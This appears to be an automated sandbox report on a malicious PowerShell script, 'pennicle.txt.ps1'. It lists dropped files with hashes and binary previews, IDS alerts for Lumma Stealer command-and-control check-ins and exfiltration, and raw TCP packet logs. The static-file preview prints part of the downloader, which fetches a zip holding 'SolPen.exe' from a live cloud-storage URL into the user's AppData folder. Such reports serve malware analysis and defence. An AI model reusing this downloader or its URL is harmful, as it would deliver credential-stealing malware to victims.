SHA-256:	0050C8566416FD7BD6F45ABC6D053BF2FF9FB45BFD1141A7A0B1B047B860CD94
SHA-512:	98A09564F42220A3A0AD55348EFD92C92BA97BC1451EB675DF1FD413A6AFF90E9D8C7F2DBC349FE1EE560ED0BB30FFB1E79A20806B67E18960F9D68F2A6AA1A1
Malicious:	false
Preview:	aP{..;nv..;..T.px.mL.j...H..(......:.!.VGt...R.K..,\|C..".SV...<./...r=..gai.]-.$u>d1. XU.t..V.S...?....n....H.B..K..q9....Y.G\|&....g..p.z....bz.!A.4kX.Z,...v.B...O.b....."..g\h.\....i.R$]JW,..$....R.."\|.!B...Z)..~.2rB...q.`n"k?~.:{...9.;.mdFj..r...w.%q 8...t......B........M.........3.Z.m..t.....@..@.C.1]@..}..@..O..cu..x3.a.f..]P./......6B.g......x+_.._.!40.8...%8.b.k.]......\.//....T..9...r.$.f..X....6[(_...1..5.^.M...2v.....L..^...mV...h.l........._....^:.L.f.3.....y"....`....[..;.S...Y[d...n.....8.R...P......~..g^..O.^..f.N,.\b..3zJ7...@.....s..Y.l&zO.....0.......o....\.y..`.= .R..l.1/.1.;...?..W2.a.5..j.D....n..Z.d.)XRd8>.:}l......S..H.[:..H$.N+..PEI,i..^e...kU,.a..q.I.~2..$...-..P..T >...Y.....2.P.4.OxE..D.o....>.-..P.SOl.J......p9oT.I.>..w..U.z.x.,...<;...X.L..1c.....D.......oC...U...e...f:v;./*.Pz.f(.5...L....o...$....^^.j...r4.@......L[..v...#.ldG..]R..#.....M..O.......i.kw'.)r.....T...)..i<j\.e".......n{.......^Qk.C.wo..2.+...A.1....

C:\Users\user\AppData\Local\Temp\Relationship

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.997890113667306
Encrypted:	true
SSDEEP:	1536:nbPuF48xIwLoTlCmoMfsn77SfudEiYUZC41OB9K5d3Uz36OAuRxxldgxhscnf:nk/xIfRxfs77SfQYyC4IB9K/3U+OAuRU
MD5:	93BF8C8B82622A4045265138BB4C51AE
SHA1:	6B5DA660E66ACA669D203C6B522AFFC3A06F0347
SHA-256:	5F5C51D9A18AA81535E2F71CC681F8012369048F4886D45DA3783BEB5215DB71
SHA-512:	371B4D3A76405E5553D9B9A56ACC7D636161FB93274E08A64A953C411F3E039390FF5235AF7E9DF3FEF2C73C3375800D04662313EBA5C0589027CB49A0ADDDE8
Malicious:	false
Preview:	..&;@1.s5..Lp..Jt@......0<........U...hv...k..Z..P...;...1.5.......?.U).5.`..;..z....2.6.u....U...J..v.....%I.d7......fM...du..j{-.z..~~H4..A...}...E.'Z....Z(..E..t...f......1.R...Z5..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....D.?.'.F...h..............9...v.:.9...v.:kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..p.P..,P..Myn.2..t.W.....c..........9...H.:.9...v.:m.....r.....5...x..2(.U.j...."c.\|#.A......)...i......-....,........G...>...l.:t..V-.._R..W.-.1....Xe.E..G...W..s....ix....(..+....m.....(..%p../.n....4..G]V.z.MX......!.......4..?..#..V....@..Z...(.G..wQ..=.IH.e.d.Z..v..X^.H.J*.0..^N....%.q..Jp.......H.(1.]........~...H.S-.ND..2.y...x.gNM...r....r22.Gb2..

C:\Users\user\AppData\Local\Temp\Solution

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	943550
Entropy (8bit):	6.625315424935375
Encrypted:	false
SSDEEP:	24576:jJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:jC7hGOSPT/PxebaiO
MD5:	663FD2C0EDE6B605CF51CDBF708D064B
SHA1:	90007034AC17CD96D381D67446C9A1D52D3B53F2
SHA-256:	6916F08C938585B6151BC98997FF230D146A9F1013F8F5A22346AD908B062EE9
SHA-512:	D3EC0D440474110BC5B87505135E96E7EF5FC198B3DF50C24BF9D48B56C7587BE0CCDFD117BFF9AD4CFECFEE68A7041E250EAC5E9179CC178E281E3F87BA97ED
Malicious:	false
Preview:	.i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B.........................................................................................................................................................................................................................................................................................................d.M..X...h.(D.....Y.h.(D.....Y..M...h.(D.....Y...L..h.(D.....Y.Q.(..h"(D..o...Y. $M.Q.@.. $M.P..=..h7(D..O...Y.....h<(D..>...Y.....hA(D..-...Y......hF(D......Y.....hP(D......Y.$5M......h_(D......Y.U.

C:\Users\user\AppData\Local\Temp\Suppose

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	55023
Entropy (8bit):	7.996817684180921
Encrypted:	true
SSDEEP:	1536:odBmGfgJ3dmSt2Y3lC3UjZY56/V9wmlqJOP:odBmjTHgY1CEjm8VCmIsP
MD5:	81A6D18B69F315FE47286A6D8C270A05
SHA1:	727A37E936E503AFC7BF19B209E641AEBD423FD6
SHA-256:	F47E3E89169A13F01AD4899328B8B3E8CC746028631FDF3D2FEC816A612754D7
SHA-512:	A7055C1871C5C1E371DAF0BBB6971DFF273C546989CF5BB748078FC3A84449F1B8FBBA81C6D30E969985D40E168158D71C80C195F4F0326C0BAC501F4A223EE9
Malicious:	false
Preview:	U.Uw.Pr..XvN.p......%./....{.E.Yt...b.@>_Y.\.3.Q1Fu.Zuk.D....g.3QB.7.S$&l....z}=3$.a.I...J.;..A..+.}8 ..$..TA..5...._...tr~.yzu...gW...=;.1XD..Q.l.A.qM.....knsxn Z...P.\|....i~.9e.b+,.{.~AW"@..k..a.$/...u..>s."3....(....f^s....(...~_.TwN..].2.p......w>.=.GJ.[#..s.+P....t....7....xt....B.Y-..T.UJ..[6..R-2..../..P....l...^.k....c{.#...c.l.t.Ec.\|.6%..%z.l..+:.(^.S-....=...,.5x.C,..W.....I(./....q.4~k.w.8...<...7...T.gJ.m...Q..P2.3...ch.{.6........X.j.=fIY~y;....5......;..2..2.0...d..c.D.x.Q.X.'.dg`..R.dZL..."w,..ID....>.d..G..]..2..........r..K...<hs.O...v...d.R..U.M...7\|"...P.wV..J.X'...z..X..vS.@.AZ...j#...:.O....<.W.QaV.J7..q..V/h.C0.U.^X...`{.:i._9..q.......3..Z.z..... ..5...h.].{.x..tF.m..2.^.h..Eu@J.[f..I..]..'G.x.$n+.Bo..3L..K.eGl8..Q.M......E..c..\|..6...9 .<.6.R.!o..,X..;v.b..7..R...R.I.s.<}.......0._S....h;.....lY!l..8.(.....e.z.mh.K..X.`.!....v..uz.!s..P....d..t..lP.....W...>.....(....O...../...o..^......L.>oA.8..]..

C:\Users\user\AppData\Local\Temp\Tits

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	263
Entropy (8bit):	5.1081162865604774
Encrypted:	false
SSDEEP:	6:T4Acj4zYUw9qjvVg3F+X32Cxscu7D6xp6sx6lFT2r:T4ALYUw9yGSGCqcQex0FA
MD5:	57D598BB11C33379FE385DFF81C08519
SHA1:	F6253EB3026C6C6C877E896B6BAEAF52AD89256F
SHA-256:	3714555DF8F9AD0598BB38E64EB6F1164FA242D8EFBF541373BBEED392BC4E6E
SHA-512:	C73EF7E89C5BCA387D0795BBB58547222E59AF48AAFC12A9F0C7757107AC0E7C4DF5F41DC0BF91136984F826D7916BDCB3132B3A06C85231EDEC5A55EC327575
Malicious:	false
Preview:	CigaretteSmallPlatesCalgary..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44amoytp.cot.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1hzyxr2.sru.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10496122
Entropy (8bit):	5.035353320065626
Encrypted:	false
SSDEEP:	24576:q2T2ETkozkFJ22KXLyGPMK2p/2lYRfKDgJ4tfG2i5:b2ETuFJVCLJGpOlYRiUJ4U2i5
MD5:	3F743B632A0A52E5D8BA262C13134B17
SHA1:	3A0938CA3CCCF15AF99258C070620E5809A8EAA8
SHA-256:	5553E4E355EE0DADE1223C455C8232A49A1B53D7F55BFCD27F6AEAFF166F67BF
SHA-512:	60813C38DB484FA365DA3FE37F86A49D3E671E7F9FEDCD8082696CF7160A171B5ECB5FD7EE0A76577AE585F3481A1866607A919A2A3EFD80553BAB9356E17326
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................p......7.....@.................................4........@..................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3ZGQX6GXFL91845PO2HA.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.712872283212247
Encrypted:	false
SSDEEP:	96:N0MCBNZtGkvhkvCCtB/BT8Hze3/BTeHzei:N09NPSB/r/U
MD5:	A4EA08AF1110F75D5F8B95E476900C37
SHA1:	C5A7B4448EF3254469B3A1E4F61F3E2C261D0678
SHA-256:	6828B4E22991BA4D168717E531B848F757A73E395A1FAEC9580867732E05F2AD
SHA-512:	5E97D7DC9C759D1978B2A284BA03098A7890F247CCC1EF351846C2CAD17F523C866E83147F2CF2CD7642A4AE775B32FA844B1E75802CE972B13A46B066A5EDAD
Malicious:	false
Preview:	...................................FL..................F.".. ...]...z....l;..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z...6....9..B.P..9......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.VrYBG..........................B...A.p.p.D.a.t.a...B.V.1.....rY@G..Roaming.@......EW.VrY@G..............................R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.VrY;G..............................M.i.c.r.o.s.o.f.t.....V.1.....EW(Y..Windows.@......EW.VrY;G..............................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VrY;G....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VrY;G....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.VrYCG................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.712872283212247
Encrypted:	false
SSDEEP:	96:N0MCBNZtGkvhkvCCtB/BT8Hze3/BTeHzei:N09NPSB/r/U
MD5:	A4EA08AF1110F75D5F8B95E476900C37
SHA1:	C5A7B4448EF3254469B3A1E4F61F3E2C261D0678
SHA-256:	6828B4E22991BA4D168717E531B848F757A73E395A1FAEC9580867732E05F2AD
SHA-512:	5E97D7DC9C759D1978B2A284BA03098A7890F247CCC1EF351846C2CAD17F523C866E83147F2CF2CD7642A4AE775B32FA844B1E75802CE972B13A46B066A5EDAD
Malicious:	false
Preview:	...................................FL..................F.".. ...]...z....l;..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z...6....9..B.P..9......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.VrYBG..........................B...A.p.p.D.a.t.a...B.V.1.....rY@G..Roaming.@......EW.VrY@G..............................R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.VrY;G..............................M.i.c.r.o.s.o.f.t.....V.1.....EW(Y..Windows.@......EW.VrY;G..............................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VrY;G....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VrY;G....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.VrYCG................

C:\Users\user\AppData\Roaming\pkg3.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1022516
Entropy (8bit):	7.985308870431231
Encrypted:	false
SSDEEP:	24576:UoO4TYojSp32w2XLSgPac2p/ylcRfs9gJ4XfoKCDdd:UoO4TEp3dWLVwp6lcRUiJ4gKCf
MD5:	2E3BD9F234997A2489194438B013A61B
SHA1:	85F1C1F38C45E7A20D2C73BCF8BCB88BC23AE866
SHA-256:	9BA9C49FCDD2332F0826EC6BA395A46EE33594E3F8B479170133D5BC395094CD
SHA-512:	7C118FFF6FE8A7782367DCE243872B52D598585C56EF5CD9D040D25EACEF6015DD086DEE42A63B82C5A6EAD8F33F8D9251E480C2CF13961AF29E293FEF003C76
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ZipBomb, Description: Yara detected ZipBomb, Source: C:\Users\user\AppData\Roaming\pkg3.zip, Author: Joe Security
Preview:	PK........a7qY.......z(......SolPen.exe...X.[.0.OB.P....J....-.....h4.....CD@H.T...1b...w..Q....z,G.."...' z..<..~..].u.....k...j......:.A. P.A....H.....i.c..!.+v..+vCeI..i.c.c......l.$.+Sl.Rl...m..'....:ja..r}.n.S...x.....;{[.....y.....w.f.=..I...r.8......#.=.?.9..`2....../...D?.P..f.r....I..p.#.;..8.8^.9....3..-......'.C.$..l.#.-........D...?.....?OvQ$d.g....m...l.b.Kz\|.". .....B..<Zj........h..k.!_.K.6... ....]9(_zFz.A.4.....-.....T...Y....-..!_?....+RS.....6.(..7D#.P..B..4&.z.'.,..4....MY..HT.. ..D......M"....T...Zh\ \|F.-.8Mv.......@Y5T.9.2.sD"..$5."H..R..+?Q..3....Zh...C<...H...R...5..-...A>.r.#........8.@X/RG4R..P.JX...4.#c.r.`D)-..*!..g...).E.......Dw.2.JA...E.&.X....!.,..l."-E...8LJY....4...AJU.l.Ds..dw..Z..5.C:...^.!~T..d..f.&.UH.=5.n...k.2.....H..`..G.<j!5#Xs5..J/.f...vC)S...sC)Ka..6(......Li...wO....Sm..... ./...s...}.`M$..A.J4..P.....6.T...T..T..#........v?.....I%...Vl.....!b(g.!7.95..G..4P.C...J..]...K..B...8.+....g...&B.A..H(.T

Static File Info

General

File type:	ASCII text
Entropy (8bit):	5.368424555284358
TrID:
File name:	pennicle.txt.ps1
File size:	478 bytes
MD5:	56b5ba0c22514be73f715832d8c2c9c7
SHA1:	b58f8034ce283cee1e514e80bc76026f133565e7
SHA256:	b0879918c9bcb34665ea7471f7ce87c6ed49a032f364ccd2ae279886a2bbd96e
SHA512:	04875fddf2ed55ee68dfdcefbda40661bafd394197ec328f3c1328dc6b4898b76c13e79a9b68fd7eafc5f009420823c4b9fbbbc1433ccb9249c42baeee498fc2
SSDEEP:	12:3Moumg2oK9d+dv2q8qG3MEAhqAnAaGltKMMn0O:3MoumvPGOq838jhNGD+/
TLSH:	F8F09763B2BC2231C1A483AAB68998428B4B2C4F300E12BE1B4D8114BD323F547EB2C5
File Content Preview:	$dxf = 'https://storageinstance.oss-ap-southeast-1.aliyuncs.com/link/process/SolPen.zip'.$bgn = "$env:APPDATA\pkg3.zip".$jvk = "$env:APPDATA\Extracted3".$txl = Join-Path $jvk 'SolPen.exe'..if (!(Test-Path $jvk)) { New-Item -Path $jvk -ItemType Directory }

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T09:58:54.899617+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49972	172.67.128.233	443	TCP
2024-11-18T09:58:55.541203+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.11	49972	172.67.128.233	443	TCP
2024-11-18T09:58:55.541203+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.11	49972	172.67.128.233	443	TCP
2024-11-18T09:58:56.233256+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49973	172.67.128.233	443	TCP
2024-11-18T09:58:56.725128+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.11	49973	172.67.128.233	443	TCP
2024-11-18T09:58:56.725128+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.11	49973	172.67.128.233	443	TCP
2024-11-18T09:58:57.473229+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49974	172.67.128.233	443	TCP
2024-11-18T09:59:00.059340+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49975	172.67.128.233	443	TCP
2024-11-18T09:59:01.773999+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49976	172.67.128.233	443	TCP
2024-11-18T09:59:03.689330+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49978	172.67.128.233	443	TCP
2024-11-18T09:59:04.199213+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.11	49978	172.67.128.233	443	TCP
2024-11-18T09:59:05.189814+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49979	172.67.128.233	443	TCP
2024-11-18T09:59:07.692257+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.11	49980	172.67.128.233	443	TCP
2024-11-18T09:59:08.525851+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.11	49980	172.67.128.233	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 09:58:09.518771887 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:09.518810987 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:09.518877983 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:09.531373024 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:09.531413078 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:10.875993013 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:10.876085043 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:10.877176046 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:10.877223015 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:10.912349939 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:10.912364960 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:10.912708044 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:10.953120947 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:10.954305887 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:10.995338917 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.401320934 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.401386023 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.401408911 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.401448965 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.401458979 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.401505947 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.401516914 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.401531935 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.401566982 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.401566982 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.403119087 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.403142929 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.403228045 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.403234959 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.403335094 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.518369913 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.518428087 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.518495083 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.518515110 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.518583059 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.518583059 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.520982981 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.521004915 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.521068096 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.521075010 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.521110058 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.521173954 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.522059917 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.522123098 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.522160053 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.522166014 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.522211075 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.522211075 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.635293961 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.635329008 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.635431051 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.635432005 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.635452032 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.635492086 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.636384964 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.636406898 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.636457920 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.636465073 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.636517048 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.636517048 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.637274981 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.637300014 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.637388945 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.637397051 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.637501001 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.691860914 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.691890001 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.692003965 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.692022085 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.692167044 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.699525118 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.699547052 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.699636936 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.699645042 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.699697971 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.721999884 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.722031116 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.722121000 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.722136021 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.722151995 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.722194910 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.753026009 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.753047943 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.753213882 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.753213882 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.753227949 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.753674030 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.753695965 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.753748894 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.753756046 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.753844976 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.754554033 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.754570007 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.754647970 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.754647970 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.754662037 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.759738922 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.759758949 CET	443	49728	47.79.48.182	192.168.2.11
Nov 18, 2024 09:58:11.759813070 CET	49728	443	192.168.2.11	47.79.48.182
Nov 18, 2024 09:58:11.759820938 CET	443	49728	47.79.48.182	192.168.2.11
